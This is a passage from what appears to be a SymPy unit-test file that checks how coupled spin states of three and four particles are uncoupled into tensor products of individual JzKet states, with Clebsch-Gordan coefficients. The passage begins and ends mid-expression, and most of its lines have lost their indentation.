JzKetCoupled(Rational(3, 2), Rational(-3, 2), (S.Half, S.Half, S.Half))
) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
)
# j1=1/2, j2=1/2, j3=1
assert uncouple(JzKetCoupled(2, 2, (S.Half, S.Half, 1))) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(2, 1, (S.Half, S.Half, 1)))
== TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0))
/ 2
)
assert (
uncouple(JzKetCoupled(2, 0, (S.Half, S.Half, 1)))
== sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 3
+ sqrt(6)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
/ 6
)
assert (
uncouple(JzKetCoupled(2, -1, (S.Half, S.Half, 1)))
== sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
)
/ 2
)
assert uncouple(JzKetCoupled(2, -2, (S.Half, S.Half, 1))) == TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
assert (
uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1)))
== -TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
/ 2
- TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0))
/ 2
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1)))
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 2
+ sqrt(2)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
/ 2
)
assert (
uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1)))
== -sqrt(2)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 2
+ TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, -1)
)
/ 2
+ TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
/ 2
)
# j1=1/2, j2=1, j3=1
assert uncouple(
JzKetCoupled(Rational(5, 2), Rational(5, 2), (S.Half, 1, 1))
) == TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1))
assert (
uncouple(JzKetCoupled(Rational(5, 2), Rational(3, 2), (S.Half, 1, 1)))
== sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1))
/ 5
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)) / 5
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(5, 2), S.Half, (S.Half, 1, 1)))
== sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1))
/ 5
+ sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0))
/ 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1))
/ 10
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1))
/ 10
)
assert (
uncouple(JzKetCoupled(Rational(5, 2), Rational(-1, 2), (S.Half, 1, 1)))
== sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 10
+ sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1))
/ 10
+ sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 5
+ sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(5, 2), Rational(-3, 2), (S.Half, 1, 1)))
== sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0))
/ 5
+ sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1))
/ 5
+ sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)) / 5
)
assert uncouple(
JzKetCoupled(Rational(5, 2), Rational(-5, 2), (S.Half, 1, 1))
) == TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, -1))
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(3, 2), (S.Half, 1, 1)))
== -sqrt(30)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1))
/ 15
- 2
* sqrt(15)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1))
/ 15
+ sqrt(15) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), S.Half, (S.Half, 1, 1)))
== -4
* sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1))
/ 15
+ sqrt(5)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0))
/ 15
- 2
* sqrt(10)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1))
/ 15
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(10) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)) / 5
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(-1, 2), (S.Half, 1, 1)))
== -sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 5
- sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 15
+ 2
* sqrt(10)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1))
/ 15
- sqrt(5) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 15
+ 4
* sqrt(5)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1))
/ 15
)
assert (
uncouple(JzKetCoupled(Rational(3, 2), Rational(-3, 2), (S.Half, 1, 1)))
== -sqrt(15)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0))
/ 5
+ 2
* sqrt(15)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, -1))
/ 15
+ sqrt(30)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1))
/ 15
)
assert (
uncouple(JzKetCoupled(S.Half, S.Half, (S.Half, 1, 1)))
== TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1)) / 3
- TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)) / 6
- sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(S.Half, Rational(-1, 2), (S.Half, 1, 1)))
== sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 2
- sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 3
+ sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, -1))
/ 6
- TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 3
+ TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)) / 3
)
# j1=1, j2=1, j3=1
assert uncouple(JzKetCoupled(3, 3, (1, 1, 1))) == TensorProduct(
JzKet(1, 1), JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(3, 2, (1, 1, 1)))
== sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)) / 3
)
assert (
uncouple(JzKetCoupled(3, 1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 15
)
assert (
uncouple(JzKetCoupled(3, 0, (1, 1, 1)))
== sqrt(10) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)) / 5
+ sqrt(10) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 10
+ sqrt(10) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 10
)
assert (
uncouple(JzKetCoupled(3, -1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)) / 15
+ 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 15
)
assert (
uncouple(JzKetCoupled(3, -2, (1, 1, 1)))
== sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)) / 3
)
assert uncouple(JzKetCoupled(3, -3, (1, 1, 1))) == TensorProduct(
JzKet(1, -1), JzKet(1, -1), JzKet(1, -1)
)
assert (
uncouple(JzKetCoupled(2, 2, (1, 1, 1)))
== -sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)) / 6
- sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 1)) / 6
+ sqrt(6) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)) / 3
)
assert (
uncouple(JzKetCoupled(2, 1, (1, 1, 1)))
== -sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 3
)
assert (
uncouple(JzKetCoupled(2, 0, (1, 1, 1)))
== -TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(2, -1, (1, 1, 1)))
== -sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 3
- sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 3
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 6
)
assert (
uncouple(JzKetCoupled(2, -2, (1, 1, 1)))
== -sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)) / 3
+ sqrt(6) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, -1)) / 6
+ sqrt(6) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)) / 6
)
assert (
uncouple(JzKetCoupled(1, 1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 30
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 15
- sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 1)) / 30
- sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 5
)
assert (
uncouple(JzKetCoupled(1, 0, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 10
- sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 10
- 2 * sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 10
- sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 10
)
assert (
uncouple(JzKetCoupled(1, -1, (1, 1, 1)))
== sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 5
- sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, -1)) / 30
- sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 0)) / 10
+ sqrt(15) * TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 15
+ sqrt(15) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 30
)
# Defined j13: couple j1+j3=j13 first, then j13+j2=j
# j1=1/2, j2=1/2, j3=1, j13=1/2
assert (
uncouple(JzKetCoupled(1, 1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1))))
== -sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 1)
)
/ 3
+ sqrt(3)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0))
/ 3
)
assert (
uncouple(JzKetCoupled(1, 0, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1))))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1)
)
/ 3
- sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half), JzKet(1, 0)
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 6
+ sqrt(3)
* TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1))
/ 3
)
assert (
uncouple(JzKetCoupled(1, -1, (S.Half, S.Half, 1), ((1, 3, S.Half), (1, 2, 1))))
== -sqrt(3)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0)
)
/ 3
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1)
)
/ 3
)
# j1=1/2, j2=1, j3=1, j13=1/2
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -sqrt(6)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 1))
/ 3
+ sqrt(3) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)) / 3
)
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -2
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 1))
/ 3
- TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 1), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)) / 3
+ sqrt(2) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)) / 3
)
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 1))
/ 3
- sqrt(2)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, 0), JzKet(1, 0))
/ 3
+ TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)) / 3
+ 2 * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, -1)) / 3
)
assert (
uncouple(
JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, 1, 1),
((1, 3, S.Half), (1, 2, Rational(3, 2))),
)
)
== -sqrt(3)
* TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(1, -1), JzKet(1, 0))
/ 3
+ sqrt(6) * TensorProduct(JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, -1)) / 3
)
# j1=1, j2=1, j3=1, j13=1
assert (
uncouple(JzKetCoupled(2, 2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, 1)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, 0)) / 2
)
assert (
uncouple(JzKetCoupled(2, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(2, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 1)) / 3
- sqrt(3) * TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 6
- sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 6
+ sqrt(3) * TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, -1)) / 3
)
assert (
uncouple(JzKetCoupled(2, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 2
+ TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(2, -2, (1, 1, 1), ((1, 3, 1), (1, 2, 2))))
== -sqrt(2) * TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 0)) / 2
+ sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(1, 1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))))
== TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, 0), JzKet(1, 0)) / 2
- TensorProduct(JzKet(1, 1), JzKet(1, 1), JzKet(1, -1)) / 2
)
assert (
uncouple(JzKetCoupled(1, 0, (1, 1, 1), ((1, 3, 1), (1, 2, 1))))
== TensorProduct(JzKet(1, -1), JzKet(1, 1), JzKet(1, 0)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, -1), JzKet(1, 1)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 1), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, 0)) / 2
)
assert (
uncouple(JzKetCoupled(1, -1, (1, 1, 1), ((1, 3, 1), (1, 2, 1))))
== -TensorProduct(JzKet(1, -1), JzKet(1, -1), JzKet(1, 1)) / 2
+ TensorProduct(JzKet(1, -1), JzKet(1, 0), JzKet(1, 0)) / 2
- TensorProduct(JzKet(1, 0), JzKet(1, 0), JzKet(1, -1)) / 2
+ TensorProduct(JzKet(1, 1), JzKet(1, -1), JzKet(1, -1)) / 2
)


def test_uncouple_4_coupled_states_numerical():
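    # Uncoupling four-particle coupled states: the result should be the
    # Clebsch-Gordan expansion over tensor products of individual JzKet states.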
# j1=1/2, j2=1/2, j3=1, j4=1, default coupling
assert uncouple(JzKetCoupled(3, 3, (S.Half, S.Half, 1, 1))) == TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 1)
)
assert (
uncouple(JzKetCoupled(3, 2, (S.Half, S.Half, 1, 1)))
== sqrt(6)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(6)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 6
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 1)
)
/ 3
+ sqrt(3)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, 0)
)
/ 3
)
assert (
uncouple(JzKetCoupled(3, 1, (S.Half, S.Half, 1, 1)))
== sqrt(15)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 15
+ sqrt(30)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 1)
)
/ 15
+ 2
* sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 0), JzKet(1, 0)
)
/ 15
+ sqrt(15)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, 1), JzKet(1, -1)
)
/ 15
)
assert (
uncouple(JzKetCoupled(3, 0, (S.Half, S.Half, 1, 1)))
== sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, 0),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
JzKet(1, 1),
)
/ 10
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
JzKet(1, 0),
)
/ 5
+ sqrt(5)
* TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
JzKet(1, -1),
)
/ 10
+ sqrt(10)
* TensorProduct(
JzKet(S.Half, S.Half), JzKet(S.Half, S.Half), JzKet(1, -1), JzKet(1, 0)
)
/ 10
+ sqrt(10)
* TensorProduct(
